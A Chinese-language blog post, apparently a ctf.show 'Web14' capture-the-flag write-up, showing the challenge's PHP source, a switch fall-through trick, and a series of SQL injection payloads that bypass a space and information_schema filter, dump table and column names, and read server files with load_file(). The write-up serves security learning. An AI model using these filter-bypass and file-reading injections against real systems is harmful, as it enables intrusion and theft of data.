ShowCtf Web14 --不会编程的崽

不会编程的崽2026-03-28 11:06

时隔一年多,终于再次有机会更新了。24年忙着HVV,在北京HVV结束后呢,回学校忙着找工作,几乎停止了学习,UP运气很好,在这个世道获得了一缕安稳。趁着这次培训抽出时间继续更新。UP很菜,有什么不对的地方,还请指正。

这个题,UP也是被耍的团团转。

php 复制代码 
<?php
include("secret.php");

if(isset($_GET['c'])){
    $c = intval($_GET['c']);
    sleep($c);
    switch ($c) {
        case 1:
            echo '$url';
            break;
        case 2:
            echo '@A@';
            break;
        case 555555:
            echo $url;
        case 44444:
            echo "@A@";
            break;
        case 3333:
            echo $url;
            break;
        case 222:
            echo '@A@';
            break;
        case 222:
            echo '@A@';
            break;
        case 3333:
            echo $url;
            break;
        case 44444:
            echo '@A@';
        case 555555:
            echo $url;
            break;
        case 3:
            echo '@A@';
        case 6000000:
            echo "$url";
        case 1:
            echo '@A@';
            break;
    }
}

highlight_file(__FILE__);

找没有break的分支,自然就是3了,访问?c=3即可,得here_1s_your_f1ag.php,继续访问

有一个弹窗,一个查询,多半是sql注入了。查看源代码,发现过滤函数

php 复制代码 
if(preg_match('/information_schema\.tables|information_schema\.columns|linestring| |polygon/is', $_GET['query'])){
		die('@A@');
	}

过滤了information_schema.tables。UP第一时间想到了无列明注入,尝试换表,测试无列明盲注,毛都没有,非常头痛。稍微稍微稍微看了其他UP的文章。

php 复制代码 
information_schema.`tables`

写成这样就好了。无语几秒,把这茬整忘了。然后就是按规矩来,明显没有引号闭合,而且是回显注入。上payload。

php 复制代码 
-1/**/union/**/select/**/1      //爆出1
-1/**/union/**/select/**/group_concat(table_name)/**/from/**/information_schema.`tables`/**/where/**/table_schema=database()    //爆出表名content
-1/**/union/**/select/**/group_concat(column_name)/**/from/**/information_schema.`columns`/**/where/**/table_name='content'   //爆出列名id,username,password
-1/**/union/**/select/**/group_concat(password)/**/from/**/content   //爆出提示flag is not here!,wow,you can really dance,tell you a secret,secret has a secret...

注入了半天,结果不在这,看提示应该在首页提醒的secret.php里。原来是考回显注入读文件。

php 复制代码 
-1/**/union/**/select/**/load_file('/var/www/html/secret.php')
//得到提示
<script>alert('<!-- ReadMe -->
<?php
$url = 'here_1s_your_f1ag.php';
$file = '/tmp/gtf1y';
if(trim(@file_get_contents($file)) === 'ctf.show'){
	echo file_get_contents('/real_flag_is_here');
}')</script>

别管这个代码了,都说了在这/real_flag_is_here,继续读。这个题很有趣,值得记录。

php 复制代码 
-1/**/union/**/select/**/load_file('/real_flag_is_here')
相关推荐
七夜zippoe2 小时前
DolphinDB SQL查询:从基础到进阶
数据库·sql·进阶·聚合·dolphindb
爪洼传承人5 小时前
AI工具MCP的配置,慢sql优化
android·数据库·sql
Aloudata5 小时前
PL/SQL 存储过程血缘解析指南:攻克数据治理的「最后堡垒」
数据库·sql·数据治理·数据管理·元数据·数据血缘
zgscwxd7 小时前
B审批流程与数据库设计要点
sql
椰猫子7 小时前
数据库(数据库相关概念、MySQL数据库、SQL(DDL、DML、DQL))
数据库·sql·mysql
喵了几个咪7 小时前
MySQL 运维实战:ibd 文件批量转换为 SQL 完整指南(基于 ibd2sql)
运维·sql·mysql
CappuccinoRose8 小时前
关系数据库标准语言(SQL)- 软考备战(三十一)
数据库·sql·软考
山峰哥8 小时前
解锁SQL优化新境界:从索引策略到高效查询实战
数据库·sql·oracle
野生技术架构师9 小时前
从两套系统到一条 SQL:SelectDB search() 搞定日志的搜索与分析
数据库·sql
一只大袋鼠9 小时前
JDBC 详细笔记:从基础 API 到 SQL 注入解决
数据库·笔记·sql·mysql
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点032026 年 AI 编程助手全面对比评测:Cursor vs Copilot vs Claude Code vs GitHub Copilot Free04GPT-6发布日深度解析-Symphony架构200万Token实战05AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析06零成本!Ollama本地部署国产大模型全指南(支持Kimi-K2.5/GLM-5/Qwen,新手秒上手)07一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛08从限购到畅通:GLM-5.1 Coding Plan接入攻略09基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南10从零部署 Hermes Agent:一只"会成长的 AI 马"保姆级安装教程